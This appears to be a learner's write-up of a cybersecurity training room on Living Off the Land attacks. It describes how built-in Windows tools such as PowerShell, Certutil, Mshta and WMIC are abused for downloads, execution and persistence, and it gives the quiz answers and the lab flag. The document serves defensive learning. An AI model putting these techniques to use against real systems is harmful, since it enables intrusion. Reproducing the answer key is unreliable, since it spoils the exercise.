Attackers do not always rely on custom malware or malicious executables. They can use trusted system tools already present on the target machine.

In this room, users will learn what LoL attacks are, why adversaries choose them, and how defenders can detect such activity through log monitoring and behavioural analysis. The room progresses from foundational knowledge to hands-on detection practice.

Learning Objectives:

• Understand what Living Off the Land attacks are

• Identify legitimate Windows tools that can be abused

• Recognise attacker techniques that blend into normal system operations

• Detect LoL behaviour using log analysis and SIEM alerts

Task 2 : Common LoL Tools and Techniques

Commonly abused tools provide scripting, management, file handling, or scheduling capabilities, which match common attacker needs like execution, persistence, reconnaissance, and lateral movement. Examples include:

• PowerShell is used for in-memory scripting, remote downloads, and automation.

• WMIC or WMI is used to run commands locally or on remote hosts and to query system state.

• Certutil is used to fetch files and encode or decode payloads.

• Mshta is used to run HTA content or an inline script delivered by a document or link.

• Rundll32 is used to invoke DLL exports or trigger URL handlers.

• Scheduled tasks (schtasks) are used to run code at logon or on a schedule for persistence.

Which public site lists Unix/Linux native binaries and how they can be abused?

GTFObins

Which Microsoft toolset includes PsExec and Autoruns, used for admin tasks and often misused by attackers?

Sysinternals

Task 3 : Real-World Examples

What MITRE technique ID covers WMI event subscriptions?

T1546.003

Which abbreviated name refers to one of the services that C2s, like Cobalt Strike, use to start or listen for remote services?

SMB

Task 4 : Detecting LOL activity

Which PowerShell switch is used to download text/strings and execute them?

IEX

Which WMIC keyword triggers the creation of a new process on a remote host?

create

Task 5 : Practical

What is the flag?

THM{LOL-but-not-that-lol-you-finishit}

Task 6 : Wrapping up

In this room, we examined how attackers repurpose trusted Windows utilities to carry out malicious activity without introducing new binaries. By testing and analysing each command safely, we observed how legitimate administrative tools such as PowerShell, WMIC, Certutil, Mshta, Rundll32, and Scheduled Tasks can be abused for execution, persistence, lateral movement, or evasion. Through these exercises, we developed a clearer view of how to recognise, detect, and respond when normal system processes are used with malicious intent.

We learned to:

• Identify the built-in Windows tools most often abused in Living Off the Land attacks.

• Understand how PowerShell enables fileless, in-memory, and automated execution.

• Observe how WMIC supports remote process creation and system reconnaissance.

• Recognise the ways Certutil downloads, encodes, or decodes malicious payloads.

• Detect Mshta and Rundll32 being used to run scripts or DLL-based payloads.

• Spot persistence mechanisms are created or triggered through Scheduled Tasks.

• Interpret process command lines and SIEM detections to separate admin from attacker behaviour.

• Apply defensive techniques such as enhanced logging, behavioural detection, and execution control to limit LoL activity.